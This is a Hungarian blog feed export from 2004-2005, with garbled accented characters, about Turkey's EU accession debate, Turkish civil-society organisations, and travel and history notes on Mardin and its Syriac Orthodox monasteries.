    Az elmתlt nיhבny יv reformpolitikבja ennek a helyzetnek a megvבltoztatבsבra irבnyul. Nevezhetjk ezt uniףs harmonizבciףnak vagy akבrminek, a lיnyeg az, hogy kםsיrlet tצrtיnik egy demokratikus Tצrצkorszבg kialakםtבsבra. Ha sikerl, Tצrצkorszבg az eurףpai kצzצssיg rיsze, uniףs tagבllam lesz. Tצrצkorszבg uniףs felvיtele nem attףl fg, milyen volt az Oszmבn Birodalom, ostromoltבk-e Bיcset יs Budבt, hanem attףl, milyen ma, milyen lesz 10-15 יv mתlva, sikerl-e valףban demokratikus viszonyokat, jogבllamot teremteni. Ma, 2004. december 15-יn, biztos vagyok abban, hogy az Eurףpai Uniף tagבllamai, kצztk Magyarorszבg, napokon bell olyan becsletes dצntיst hoz Tצrצkorszבg uniףs csatlakozבsבrףl, amely esיlyt ad erre. Az, hogy mi lesz 2004. december 17. utבn, nemcsak a tצrצkצkצn mתlik, hanem rajtunk is. -
    -
    -
    -
    Szeretnיm, ha ez a post segםtne a magyar יs a tצrצk civil tבrsadalom kצzצtti kapcsolatיpםtיsben. Nagy szksיg volna rב.
    -
    -
    -
    -
    2005 nyarבra-őszיre az Eurףpai Bizottsבg elkיszםt egy sokיves programot a Tצrצkorszבg יs az uniףs tagבllamok civil szervezetei יs tבrsadalmai kצzצtti kapcsolatok erősםtיsיről, lehetősיget biztosםtva arra, hogy az uniףs יs a tצrצk בllampolgבrok jobban ismerjיk יs segםtsיk egymבst. Jף volna, ha ebben mi, magyarok יs magyar NGO-k is megtalבlnבnk a helynket.
    -
    -
    -
    -
    Ezen a poston hבrom dolgot talבlhattok: hםreket, partnereket, יs segםtő szבndיkot, ez utףbbi az enyיm - keressetek, ha a civilek kצzצtti kapcsolatיpםtיsben tבmogatבsra van szksיgetek.
    -
    -
    -
    -
    - -I. HֽREK: - -
    -
    -
    -
    - -
    -
    -
    -
    -
    - -II. CIVIL SZERVEZETEK: - -
    -
    - - - -
    -
    -
    - -1. NGO-k a nők jogaiיrt: - -
    -
    -
    -
    - -
    -
    -
    - -
    -
    -
    -
    -KA-DER (TR)
    -
    -
    -
    - -
    -
    -
    -
    -ACEV (TR/EN)
    -
    -
    -
    - -
    -
    -
    -
    - -2. Emberjogi szervezetek - -
    -
    -
    -
    - -
    -
    -
    - -
    -
    -
    - -
    -
    -
    - -
    - -
    -
    -
    -
    -
    - -3. Ifjתsבgi szervezetek - -
    -
    - - - -
    -
    - -
    - - - -
    -
    -
    - -4. Kutatףintיzetek - -
    -
    -
    -
    -
    -TESEV (TR/EN)
    -
    -
    -
    -
    -TOSAM (TR/EN)
    -
    -
    -
    - -false - - - - -Efendi - -2004-09-26T15:58:04+02:00 -2005-01-08T22:49:04Z -2004-09-26T14:00:59Z - -tag:blogger.com,1999:blog-7074887.post-109620725917565558 -Mardin/Tur Abdin/Mor Gabriel szםr ortodox kolostor - -
    -
    A postban a Mardin tartomבnyban יlő szםr ortodox keresztיnyeket szeretnיm bemutatni, de Mardint nem lehet nem megemlםteni - ha teheted, nיzd meg, soha nem fogod elfelejteni.
    -
    -
    -
    -
    -
    Igazi mתzeumvבros, igazi Kelet! Az asszםr birodalom ףta (i.e. 3800 - 562) lakott teleplיs. Az ףvבros fantasztikus, csak gyalog jבrhatף - rצgtצn a kצzיpkorban יrezheted magadat. Rengeteg a kőfaragבssal diszםtett szיp יplet. Ejtsיtek תtba a Sultan Isa Medreszיt (1385), az Ulu Dzsבmit, amelyet a szeldzsukok יpםtettek a XI. szבzadban, a X. szבzadban יplt vבrat, az V. szבzadi Kirklar templomot, az Archeolףgiai Mתzeumot, meg persze a piacokat. Nיzd meg ezt az oldalt (MAREV), rengeteg kitűnő fotףval a vבrosrףl!
    -
    -
    -
    -
    -
    Mardin egיszen kצzel van a szםriai hatבrhoz. A legkצzelebbi reptיr Diyarbakirban יs Sanliurfבban van, a tבvolsבg az előbbitől 90, az utףbbitףl 180 km, kocsival/busszal 1-2 ףra. Isztambulbףl, Izmirből, Ankarבbףl autףbusszal is elיrhető (Varan, Ulusoy, Koc - ezek a legjobbak). Mardin - Isztambul ill. Izmir tבv kb. 1500, Mardin - Ankara kb. 1000 km.
    -
    -
    -
    -
    -
    Nיhבny יve mיg rendkםvli בllapot volt a tartomבnyban, most is erős a katonai/csendőri jelenlיt, időnkיnt צsszetkצzיsek is vannak a terroristבkkal - főleg a Mardintףl 22 km-re lיvő Kiziltepe hםrhedt ilyen szempontbףl. A hely most mבr nagyjבbףl biztonsבgos, de azיrt Mardin vבrosבn kםvlre csak vilבgosban יrdemes elindulni, s nem egyedl, illetve inkבbb utazבsi iroda kםsיrőjיvel vagy szervezett formבban. A helyi idegenforgalmi hivatalt a(482) 2127406 telefonon lehet elיrni. ֹrdemes prףbבlkozni a gaziantepi szיkhelyű Arsan utazבsi irodבval. Szבllבslehetősיg: a legjobb szבllבs a 30 szobבs Erdoba Evleri (tel. 482 - 2137787, 2127677, mבsik link itt) egy fő/יj reggelivel kb. 40 dollבr (feltיtlenl foglalj előre szobבt), szףba jצhet mיg a mellette lיvő Satana Evi vagy a Bilen Hotel (tel. 482 - 2125568), a tצbbi szבllבshelyet inkבbb יrdemes elkerlni. Kiziltepיben ugyan jף a Hotel ײztopraklar, oda viszont mיg ne menjetek.
    -
    -
    -
    -
    -
    Kitűnő mardini weboldalak: MAREV (TR) Midyatlilar (TR) Mardin City (TR, EN)
    -
    -
    -
    -
    A mardini kormבnyzףi hivatal oldalבn talבlsz utazבsi יs mבs hasznos informבciףt (EN TR)
    -
    -
    -
    -
    -
    Mardin kצrnyיke is csodבlatos, vבrak, templomok, dzsבmik mindentt. A kצnnyen elיrhető יs kihagyhatatlan helyek kצzl az első kettő Midyat יs Hasankeyf, meg persze a szםr ortodox keresztיny helyek - folytatom is velk.
    -
    -
    -
    -
    -
    Tצrצkorszבgban a kilencvenes יvekig 20-40 ezer szםr ortodox keresztיny יlt, jף rיszk Mardin tartomבnyban (ez a valamikori Felső-Mezopotבmia). Az egyhבz eredete a korai keresztיnysיgig, a IV-VI. szבzadig nyתlik vissza.
    -
    -
    -
    -
    -
    Ebben az időben Kelet-Tצrצkorszבgban kיt nagy keresztיny kצzצssיg jצtt lיtre.
    -
    -
    -
    -
    -
    Az egyik az צrmיny: ők mבr a IV. szבzadban בllamvallבssב tettיk a keresztיnysיget, (mיg azelőtt, hogy az 381-ben בllamvallבs lett a Bizבnci azaz Kelet-Rףmai Birodalomban), s a Bibliבt mבr 410-ben lefordםtottבk צrmיny nyelvre. (Az צrmיny Bagratida Kirבnysבgrףl nיzd meg az "Ani" posztot.)
    -
    -
    -
    -
    -
    -A mבsik keresztיny kצzצssיg a szםr ortodox volt, amelynek tagjai a sיmi nyelvcsalבdhoz tartozף arבmi nyelvet beszיltיk. (Az arבmi az i.e. VIII - i.e. IV. szבzadban a Kצzel-Kelet kצzvetםtő nyelve volt, valףszםnűleg azt beszיlte Jיzus is. A Tצrצkorszבgban יlő szםr ortodox keresztיnyek - akiket a tצrצkצk sryaninak hםvnak - jף rיsze ma is az arבmeus nyelv keleti nyelvjבrבsבt hasznבlja.) Tagjai az Antiochiבban (a mai Antakyבban) i.sz. 37-ben Pיter apostol בltal lיtrehozott, ugyanezt a nyelvet beszיlő korai keresztיny kצzצssיgből eredeztetik magukat. Antiochia ekkor Rףma szםriai tartomבnyבnak fővבrosa volt. A kצvetkező יvszבzadokban a keresztיnysיg elterjedt a Tigris (mai tצrצk nevיn Dicle) יs az Eufrבtesz (mai nevיn Firat) felső tיrsיgיben. A mai Sanliurfa (az akkori Edessa) lehetett a szםr ortodox keresztיnysיg bצlcsője. A tיrsיg ebben az időben a vallבsi hierarchiבban az antiochiai pspצksיghez tartozott, amely 325-ben patriarchבtus rangjבra emelkedett.
    -
    -
    -
    -
    -
    Az צnבllף szםr ortodox keresztיny egyhבz azonban csak a VI. szבzadban (ez Justinianus bizבnci csבszבr kora) jצtt lיtre. Nagy szerepe volt ebben Jacob Baradi monofizita pspצknek - ezיrt hםvjבk az egyhבzhoz tartozףkat jakobita keresztיnyeknek is. Miיrt is lett צnבllף egyhבzuk?
    -
    -
    -
    -
    -
    A monofizitבk vitבban בlltak Bizבnccal az Atya יs Krisztus viszonyבnak megםtיlיse kapcsבn. A keresztיnysיg teolףgiai vitבinak eldצntיsיre, mint tudjuk, hיt egyetemes zsinatot tartottak, valamennyit a mai Tצrצkorszבg terletיn (bבr a monofizitבk csak az első nיgyet ismerik el egyetemesnek, mivel az utolsף hבrmon mבr nem vettek rיszt.) 325-ben a mיg meg sem keresztelt Nagy Konstantin bizבnci csבszבr elnצkצlte az első egyetemes (צkumenikus) zsinatot nicaea-i palotבjבban (a vבrost ma Iznik nיven talבlod meg Tצrצkorszבgban a Mבrvבny-tenger mellett).
    -
    -
    -
    -
    A monofizitבk a negyedik egyetemes zsinatig, azaz a 451. יvig tartottak ki (a zsinat a mai Kadikצyben (Isztambul) volt, akkor mיg Khalkedonnak hםvtבk). A Krisztus termיszetיről folytatott teolףgiai vitבban ezen a zsinaton veresיget szenvedtek, a rבjuk kיnyszerםtett nyugati felfogבst az isteni termיszetről azonban nem voltak hajlandףk elfogadni. 451-ben szakadבs kצvetkezett be az antiochiai patriarchבtusban: lיtrejצtt a ma gצrצgkeletinek nevezett ortodox egyhבz, illetve a szםr ortodox egyhבz. Mindkיt irבnyzat pspצkei magukat akartבk elfogadtatni a patriarchבtus vezetőjיnek. A Justinianus בltal tבmogatott gצrצgkeleti irבnyzat győzצtt: 518-ban a szםr ortodox pבtriבrkבt szבműztיk Antiochiבbףl. Mardin 1293-tףl 14 יvszבzadon בt volt szםr ortodox vallבsi kצzpont, a pבtriבrka szיkhelye (Deyr-Ul-Zafaran kolostor). A pבtriבrkבnak politikai okokbףl 1933-ban kellett tבvoznia kellett, azףta Szםria, 1959. ףta Damaszkusz az egyhבz kצzpontja.
    -
    -
    -
    -
    A szםr ortodox egyhבzon kםvl ma is monofizita az צrmיny, az egyiptomi kopt יs az etiףp egyhבz, a maronita keresztיnyek Libanonban, de יlnek monofizita (nesztoriבnus) kצzצssיgek Indiבban, Irבnban, Kצzיp-ֱzsiבban is. Talבn mיg annyit, hogy a jakobita יs az צrmיny egyhבz 728-ban Manzikertben (a mai tצrצkorszבgi Malazgirt) kםsיrletet tett az egyeslיsre, בm az erőfeszםtיs nem jבrt sikerrel.
    -
    -
    -
    -
    -
    A szםr ortodox keresztיnyek sok jף weboldalt műkצdtetnek, egy linkgyűjtemיnyt itt talבlhatsz. Kettőt klצn kiemelek: יrdemes tanulmבnyozni azokat, sok praktikus informבciףt is tartalmaznak. Az egyik a Margoneetho (ez gyצngyצt jelent) SOR azaz Syriac Orthodox Resources, a mבsik pedig a Suryoyo On-line, Gצttingenből.
    -
    -
    -
    -
    -
    Mardin tיrsיgיben valaha 80 kolostor בllt יs 150 pspצk tevיkenykedett. A kolostorok kצzl ma hבrom műkצdik: a 396-ban יpםtett Mor Gabriel vagy mבsik nevיn Deyr-Ul-Umur (a Mardin tartomבnybeli Midyat jבrבsi kצzponttףl 22 km-re lיvő Tur Abdinban), Mor Yakub (Nusaybinban, Salah, mבs nיven Baristepe teleplיsen) יs a 493-ban יplt, Mardin vבrosבtףl 5 km-re, Eski kale teleplיsen talבlhatף Deyr-Ul-Zafaran (a pבtriבrka volt szיkhelye). A kolostorok felbecslhetetlen יrtיkű korai keresztיny dokumentumokkal rendelkeznek. Mבs kolostorok יs templomok is megvannak mיg, ha nem is műkצdnek, ezekről majd kיsőbb.
    -
    -
    -
    -
    Magam a Mor Gabrielben jבrtam, םgy arrףl - meg Mardin vבrosבrףl -tudtam fotףkat felrakni a postra.
    -
    -
    -
    - -
    - -
    -
    -
    - -Tur Abdin metropolitבja Mor Timotheus Samuel Aktas, rףla itt olvashatsz. - - -
    -
    - - - -
    -
    -

    - -Tur Abdin - - a felső-mezopotבmiai fensםkon van, amely Mardintףl Cizrיig terjed, kצzpontja Midyat. Tur Abdin jelentיse: 'Isten szolgבinak fennsםkja'. -

    -

    -Sajnos, a nyolcvanas-kilencvenes יvek terrorizmusa יs a terrorizmus-ellenes hadjבrat (Szםriבban a hatבr tיrsיgיben PKK-bבzisok voltak) teljesen felborםtotta a stabilitבst: a szםr ortodox kצzצssיg nagy rיsze klfצldre vagy Tצrצkorszבg mבs vבrosaiba meneklt, s Mardin tartomבny kurd יs mבs identitבsת lakosai kצzl is sokan elhagytבk lakףhelyket. Az 1999. ףta eltelt bיkיs צt יv alatt egyelőre kevesen tיrtek haza: nagy mיg a bizalmatlansבg, a kבrok helyreבllםtבsa messze nem fejeződצtt be, s a szםr keresztיnyek hבzainak egy rיszיbe hםvatlan vendיgek, a kormבny בltal a terroristבkkal szemben alkalmazott תgynevezett faluőrצk, egyfajta fיlkatonai szervezet tagjai kצltצztek be (a szervezetet mבig sem szבmoltak fel, kצzel 60 ezer, בllamilag fizetett tagja יs elיg kיtes hםre van). Meg kell emlםteni Mardin תjstetű kormבnyzףjבnak kedvező hozzבבllבsבt. A klfצldről hazatיrt szםr keresztיnyek egy csoportja a faluőrצk miatt nem tudott visszakצltצzni hבzבba, s a kormבnyzף bő fיl יvig sem szיp szףval, sem cserelakבs םgיretיvel nem tudta ez utףbbiakat kilakoltatni, םgy vיgl a csendőrsיggel volt kיnytelen jobb belבtבsra bםrni a hבzfoglalףkat. -

    -

    -A szםr keresztיny egyhבz az elmתlt kיt יvtizedben hםvőkben, tבmogatףkban meggyenglt ( - -erről itt olvashatsz - - angolul יs nיmetl + - -itt angolul - - -). A tצrצk tצrvיnyek miatt nem folytathat oktatבsi tevיkenysיget, papkיpzיst, םgy talpraבllבsa nehיz. A helyzet azonban - -nem remיnytelen - -. -

    -
    - -Weboldalak a Mor Gabriel kolostorrףl - -nיmetl - - - -tצrצkl - - - -angolul - -. -
    -
    - -
    -
    - -
    -
    - -folyt kצv - -
    -
    - -false - - - - -Efendi - -2004-09-24T23:00:00+02:00 -2005-03-16T20:49:39Z -2004-05-22T21:36:40Z - -tag:blogger.com,1999:blog-7074887.post-108526180053157077 -Tצrצkorszבg az Eurףpai Uniףban? -<div align="center"><span style="font-size:130%;color:#ff0000;">2005.</span></div><div align="center"><br /><br /></div><div align="justify"></div><div align="center">A Magyar-Tצrצk Barבti Tבrsasבg rendezvיnye: </div><div align="center"><span style="font-size:130%;">Tarik Demirkan - Tצrצkorszבg a EU kszצbיn</span></div><div align="center">Mבrc. 31., cst. 17.30. </div><div align="center">Bp.VI. Bajza u. 54. I. em. Nemzetek Hבza</div><div align="center"><br /></div><div align="center"><em>(A Median februבri felmיrיse szerint a magyarok kb. 58 szבzalיka יrt egyet Tצrצkorszבg eurףpai uniףs csatlakozבsבval!)</em></div><div align="justify"><br /></div><div align="justify"></div><div align="center"><span style="font-size:130%;color:#ff0000;">2004.</span></div><div align="center"><strong><span style="font-size:130%;color:#ff0000;"></span><br /><br /></div><div align="justify"></div><div align="justify">Tצrצkorszבg 1999. ףta tagjelצlt az Eurףpai Uniףban. 2004. <span style="color:#ff0000;">oktףber 6-בn</span> az Eurףpai Bizottsבg kצzzיteszi יrtיkelיsיt a tצrצk felkיszlיs elmתlt 3 יvיről, majd ennek alapjבn <span style="color:#ff0000;">december 17-יn </span>az Eurףpai Tanבcs dצnt arrףl, hogy a tagבllamok megkezdik-e Ankarבval a csatlakozבsi tבrgyalבsokat, יs ha igen, mikor.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Az eurףpai בllamok kצzvיlemיnye יs dצntיshozףi megosztottak, s Tצrצkorszבgban is eltיrőek a vיlemיnyek arrףl, kell-e az orszבgnak az uniףs tagsבg, vagy ennek a 70 milliףs בllamnak mבs utakat keresve kellene inkבbb boldogulnia. Nyilvבnvalףan nem a mai Tצrצkorszבg fog belיpni az uniףba, s belיpיsekor az Uniף is nagyban mבs lesz, mint ma. A decemberi dצntיs sem a felvיtelről, hanem a csatlakozבsi tבrgyalבsok megkezdיsיről szףl, s ez utףbbiak akבr 10-20 יvig is elhתzףdhatnak.<br /></div><div align="justify"><br /></div><div align="justify">A Tצrצkorszבggal kapcsolatos dצntיs a magyar יrdekeket is יrinti. Magyarorszבg rיszt vesz az uniףs dצntיshozatalban, s a magyar kormבny nyilvבn mיrlegeli azt is, hogyan viszonyul a tצrצk csatlakozבshoz az orszבg lakossבga, a magyar kצzvיlemיny. Egyelőre תgy tűnik, sehogy, mintha lenne elיg bajunk enיlkl is, בm ez vבltozni fog. A tצrצk csatlakozבs valamennyinket יrint.</div><div align="justify"><br /></div><div align="justify">Szeretnיm, ha ez a post segםtene benneteket a tבjיkozףdבsban. Igyekszem belinkelni a legfontosabb olvasnivalףkat, kommentבlni a fejlemיnyeket יs vבlaszolni a kיrdיsekre. Tehבt irבny a "comments" link, rףlad is szףl a mese!</div><div align="justify"><br /></div><div align="justify">Az elmתlt hףnapok tצrצkorszבgi uniףs fejlemיnyeiről <a href="http://torokorszag.blogspot.com/2004/09/nk-helyzete-trkorszgban.html">"A nők helyzete Tצrצkorszבgban"</a> postban olvashatsz, mivel - rajtunk kםvlבllף okokbףl - az volt napirenden (meg lesz is mיg). </div><div align="justify"><br /></div><div align="justify"><em><strong><span style="color:#ff0000;">okt. 5.</span> Holnap meglבtjuk az Eurףpai Bizottsבg orszבgjelentיsיt. Rבgףdhatunk rajta december 17-ig mיg eleget. Most mבr biztos, hogy bizonyos okokbףl novemberig nem tudok semmifיle eszmecserיt animבlni itt a blogon a tצrצk csatlakozבs kיrdיsיben, ezיrt nיhבny gondolatomat ma szeretnיm megosztani a lבtogatףkkal.</strong></em></div><div align="justify"><em><br /><strong></strong></em></div><div align="justify"><em><strong>Tצrצkorszבgnak helye van az Uniףban. </strong></em></div><div align="justify"><em><strong></strong></em><br /></div><div align="justify"><em><strong>De nem a mai Tצrצkorszבgnak יs nem ma. </strong></em></div><div align="justify"><em><strong></strong></em><br /></div><div align="justify"><em><strong>Tצrצkorszבg az elmתlt hבrom יvben irgalmatlanul nagyot lיpett előre, de egyelőre bevבltatlan םgיret. Ha azt mondjuk, hogy teljesםti a koppenhבgai politikai kritיriumokat, ez nem jelent mבst, mint az eddigi, pבr יves teljesםtmיnye alapjבn megelőlegezett bizalmat. Azt, hogy lehetsיges a jogבllamisבg, a demokrבcia megteremtיse, a transzparencia, a csatlakozבsi tבrgyalבsokkal pבrhuzamosan. </strong></em></div><div align="justify"><em><strong></strong></em><br /></div><div align="justify"><em><strong>Esיly, amelyet meg kell adni. </strong></em></div><div align="justify"><em><strong></strong></em><br /></div><div align="justify"><em><strong>Esיly, s יrtיkelni, mיrni kell, hogyan יlnek vele.<br /></strong></em></div><div align="justify"><strong><em></em><br /></strong></div><div align="justify"><em><strong>Tצrצkorszבg nem Isztambul, nem Antalya, hanem Hakkari, Kars, Erzurum, Sivas יs Tunceli meg Diyarbakir. Szunnitבk יs alevitבk. Tצrצkצk, kurdok, meg mיg kיt tucat etnikum. Ugyanennyi יlő nyelv. A 28 kurd lבzadבs orszבga. Az elmתlt 80 יv sok zsבkutcבja יs sok eredmיnye. Modern viszonyok az orszבg egy rיszיben, tצrzsiek mבsutt. Ahogy az egysיges szovjet nemzetet sem sikerlt megteremteni, ugyanolyan kיtes eredmיnnyel jבrtak az elmתlt 80 יv egysיges nemzetבllami tצrekvיsei Tצrצkorszבgban is. Rengeteg mתltbיli sיrelem, amelyeket orvosolni kell. Rengeteg eltemetetlen halott, megbocsבtandף bűn, elkerlhetetlen bűnbבnבs. Vannak utak, amelyeket a tבrsadalomnak meg kell jבrnia, problיmבk, amelyeket nem lehet puccsokkal orvosolni, megoldבsok, amelyeket a tבrsadalomnak magבnak kell kikםnlףdnia. </strong></em></div><div align="justify"><strong><em></em><br /></strong></div><div align="justify"><em><strong>Ehhez יvtizedek szksיgesek. Mikיnt a tבrsadalmi יs gazdasבgi modernizבciףhoz is. Meg klső partnerek is, ezek volnבnk mi, uniףs tagבllamok. Olyanok, amilyenek vagyunk, ha erre mindig nem is lehetnk bszkיk. </strong></em></div><div align="justify"><strong><em></em><br /></strong></div><div align="justify"><em><strong>Jף megoldבs fog szletni, bםzzunk benne, oktףber 6-בn, meg majd december 17-יn is. </strong></em></div><div align="justify"><strong><em></em><br /></strong></div><div align="justify"><em><strong>Olyan, amely esיlyt kםnבl יs tבmogatבst ad Tצrצkorszבg gazdasבgi-tבrsadalmi modernizבciףjבhoz, de esיlyt ad Eurףpבnak is a vבltozבsra, arra, hogy befogadja ezt a bszke, makacs, fafejű, most mיg hol szצrnyen nacionalista, hol messzemenően tolerבns, hozzבnk hasonlף komporszבgot - liberבlis יrtelmisיgיvel, messianisztikus hadseregvezetיsיvel, jobb- יs baloldali meg etnikai szיlsősיgeseivel, - amelyek nemcsak plakבtot ragasztgatnak -, az irticבval, az lkckkel, a kemalista rיgi establishmenttel, Anadolu תj oroszlבnjaival, TSIAD-dal יs MSIAD-dal, mindenfelől indoktrinבlt, ki- יs felhasznבlt polgבraival. </strong></em></div><div align="justify"><strong><em></em><br /></strong></div><div align="justify"><em><strong>Akiket Ti is, יn is, annyira kedvelnk, de akiket Magyarorszבgon szinte egyבltalבn nem ismernk. Sok sikert tehבt Botondnak יs a Tilos Rבdiףnak.</strong></em></div><div align="justify"><strong><em></em><br /></strong></div><div align="justify"><em><strong>Szףval, trelem kell, jףzan יsz, sok-sok munka, mindkיt oldalon. Uzun ve ince yol, ahogy Turgut ײzal mondta. Ha mבr nem is olyan uzun, mint volt '87-ben.</strong></em></div><div align="justify"><em><br /><strong></strong></em></div><div align="justify"><em><strong>A rיszletekre meg majd novemberben visszatיrnk. Szeretnיm, ha elmondanבtok, Ti mit gondoltok a tצrצk csatlakozבsrףl.</strong></em></div><div align="justify"><strong><em></em></strong></div><div align="justify"><em><strong>Efendi.</strong></em></div><div align="justify"><strong><em></em></strong><br /></div><div align="justify"><strong><em></em></strong></div><div align="justify"><strong><span style="color:#ff0000;">okt. 6.</span> A <a href="http://www.eu2004.hu/index.php?op=hirek&id=1351&amp;PHPSESSID=ed85ba09a568b86266c7c6759ffc53fd">Bizottsבg javaslata</a> korrekt: javasolja, hogy a tagבllamok vezetői dצntsenek decemberben a tצrצk csatlakozבsi tבrgyalבsok megkezdיsיről. Elvבrja, hogy folytatףdjיk a reformfolyamat Tצrצkorszבgban, nevesםti a meglיvő problיmבkat. Beיpםt fיkeket a tבrgyalבsi folyamatba, םgy ha bבrki Tצrצkorszבgban megprףbבlnב rossz irבnyba vinni a dolgokat, a tבrgyalבsokat fel lehet fggeszteni, plusz בllandף ellenőrzיs fog יrvיnyeslni. Harmadszor, segםteni fogja a civil tבrsadalom erősצdיsיt Tצrצkorszבgban, יs a tצrצk, illetve az uniףs בllampolgבrok pבrbeszיdיt, amire nagy szksיg van. A dצntő szףt a tבrgyalבsok megkezdיsיről az uniףs tagבllamok vezetői fogjבk kimondani december 17-יn.</strong></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong></strong></div><div align="justify"><strong>A bizottsבgi dokumentumokat itt olvashatod:</strong></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong></strong></div><div align="justify"><strong>Ajבnlבs <a href="http://europa.eu.int/comm/enlargement/report_2004/pdf/tr_recommendation_en.pdf">angolul</a> <a href="http://europa.eu.int/comm/enlargement/report_2004/pdf/tr_recommendation_de.pdf">nיmetl</a> <a href="http://europa.eu.int/comm/enlargement/report_2004/pdf/tr_recommendation_fr.pdf">franciבul</a></strong></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong>Orszבgjelentיs <a href="http://europa.eu.int/comm/enlargement/report_2004/pdf/rr_tr_2004_en.pdf">angolul</a> <a href="http://europa.eu.int/comm/enlargement/report_2004/pdf/rr_tr_2004_de.pdf">nיmetl</a> <a href="http://europa.eu.int/comm/enlargement/report_2004/pdf/rr_tr_2004_fr.pdf">franciבul</a></strong></div><div align="justify"><br /></div><div align="justify"><strong>Hatבstanulmבny Tצrצkorszבg csatlakozבsבrףl <a href="http://europa.eu.int/comm/enlargement/report_2004/pdf/issues_paper_en.pdf">angolul</a> <a href="http://europa.eu.int/comm/enlargement/report_2004/pdf/isssues_paper_de.pdf">nיmetl</a> <a href="http://europa.eu.int/comm/enlargement/report_2004/pdf/isssues_paper_fr.pdf">franciבul</a></strong></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong>A korבbbi uniףs dokumentumokat Tצrצkorszבgrףl <a href="http://europa.eu.int/comm/enlargement/report_2004/">ezen a linken</a> talבlod meg. <a href="http://europa.eu.int/comm/enlargement/turkey/">Itt pedig lבthatod</a> az Eurףpai Bizottsבg minden lיnyeges hבttיrinformבciףjבt Tצrצkorszבgrףl יs a tצrצk-EU kapcsolatokrףl.</strong></div><div align="justify"><br /><strong><span style="font-size:130%;color:#ff0000;">Olvasnivalף:</span></strong></div><div align="justify"><strong><span style="font-size:130%;color:#ff0000;"></span></strong></div><div align="justify"><span style="font-size:85%;"><a href="http://hvg.hu/vilag/20041215nemteljesitankara.aspx">Mit nem teljesםtett mיg Ankara?</a> - HVG, 2004. dec. 15.</span> </div><div align="justify"></div><div align="justify"><strong><span style="font-size:130%;color:#ff0000;"></span></strong></div><div align="justify"><strong><span style="font-size:130%;color:#ff0000;"></span></strong></div><div align="justify"><span style="font-size:85%;"><a href="http://hrw.org/english/docs/2004/12/15/turkey9865.htm">A Crossroads for Human Rights? Human Rights Watch’s key concerns on Turkey for 2005</a> (EN, FR, DE) - 2004. dec. 15.</span></div><div align="justify"><br /></div><div align="justify"><span style="font-size:85%;"><a href="http://hrw.org/english/docs/2004/12/15/turkey9866.htm">Turkey: EU Green Light Would Bolster Rights Reform</a> (EN, FR, DE) - Human Rights Watch, 2004. dec. 15.</span></div><div align="justify"><strong><span style="font-size:130%;color:#ff0000;"></span></strong></div><div align="justify"></div><div align="justify"><strong><span style="font-size:130%;color:#ff0000;"></span></strong></div><div align="left"><span style="font-size:85%;"></span><br /></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><span style="font-size:130%;"><strong>Tצrצkorszבg a kapuk előtt</strong></span></div><div align="justify"><span style="font-size:85%;">Nיpszabadsבg • Szent-Ivבnyi Istvבn • 2004. oktףber 1.</span></div><div align="justify"><span style="font-size:85%;"><br /></span></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><span style="font-size:85%;">Az igazsבg pillanata itt van. Az Eurףpai Bizottsבg oktףber 6-בn teszi kצzzי jelentיsיt Tצrצkorszבg felkיszltsיgיről, s az Eurףpa Tanבcs erre alapozva hatבroz majd decemberben a csatlakozבsi tבrgyalבsok megkezdיsיről. Nem Tצrצkorszבg felvיtelיről tehבt, hanem arrףl, hogy meginduljon-e az a folyamat, amely a tagjelצlt megfelelő teljesםtmיnye esetיn a tagsבghoz vezet. Ez a procedתra mindkיt fיl rיszיről komoly elkצtelezettsיget jelent. Legfőbb ideje Magyarorszבgon is megvitatnunk, van-e helye Tצrצkorszבgnak az EU-ban.</span></div><span style="font-size:85%;"><div align="justify"><br />Az EU klpolitikבja szבmunkra csatlakozבsunk előtt jobbבra adott tיnyező volt, alakםtבsבban csak kצzvetetten יs korlבtozottan vehettnk rיszt. Akkoriban termיszetesnek tűnt, hogy elsősorban szűkebb rיgiףnk gyeinek vitelיben vבllalunk aktםv יs kezdemיnyező szerepet. Tagkיnt azonban nem engedhetjk meg magunknak azt a fיnyűzיst, hogy ne nyilvבnםtsunk vיlemיnyt az uniף lיnyegיt, cיljבt יs jצvőjיt יrintő kיrdיsekben. <em><a href="http://www.nol.hu/cikk/334836/">folytatבs</a></em></div><p align="justify"><em><strong>Petőcz Andrבs cikke: </strong></em></span><span style="font-size:85%;"><strong>A feketeleves mיg hבtravan</strong> (Nיpszabadsבg, 2004. okt. 19.) </span></p><p align="justify"><span style="font-size:85%;"><em>(rיszlet az םrבsbףl:</em> Magyarorszבg az egyetlen a jelenlegi Eurףpai Uniףban, mely a tצrtיnelem sorבn "szoros kapcsolatban" volt Tצrצkorszבggal... Magyarorszבg, szerintem יrintett ebben a kיrdיsben. Meglepő, hogy mikצzben Raffarin francia miniszterelnצk בllבst foglal, az תj magyar miniszterelnצk nem. Vajon a tanבcsadףi tבjיkoztatjבk-e az uniףs בllamok megosztottsבgבrףl Gyurcsבny Ferencet, יs vajon nem lehetsיges-e, hogy יppen a magyar parlamentben kellene a franciבhoz hasonlף vitבt lefolytatni? ֹs vajon a tצrצk csatlakozבs mennyire elfogadhatף a magyar kצzvיlemיny szבmבra?...)<a href="http://www.nol.hu/cikk/336942/"> </a></span><span style="font-size:85%;"><a href="http://www.nol.hu/cikk/336942/"><em>(a teljes םrבs itt olvashatף)</em></a></span></p><p align="justify"><span style="font-size:85%;">EFENDI KOMMENTֱRJA - Dec. 14.<br />Kellenek-e a tצrצkצk az EU-ban?<br />A Magyar Nemzet On-line "Kellenek-e a tצrצkצk az EU-ban?" fףrumבban mבrcius ףta 848 hozzבszףlבs foglalkozott azzal, van-e Tצrצkorszבgnak helye az Uniףban. Lיgy szםves, szבnj rב egy ףrבt, יs olvasd el az צsszes hozzבszףlבst <a href="http://www.mno.hu/index.mno?pg=3&action=showmsg&amp;tid=15551">EZEN A LINKEN</a>. Tיnyleg kיrlek, olvasd el az egיszet, a korrekteket, a jףzanul kיtkedőket, a gyomorfordםtף, a rasszista, a xenofףb, az antiszemita, vagy az egyszerűen csak ostoba, primitםv hozzבszףlבsokat יppתgy, mint azokat a vיlemיnyeket, amelyek nacionalista, indoktrinבlt vagy naםv tצrצk gondolkodבst tkrצznek יs ahelyett, hogy dhצngenיl, gondolj vיgig nיhבny dolgot:<br />Demokratבk vagyunk-e?<br />Tudjuk-e, hogy az Eurףpai Uniף tagבllamai, kצztk 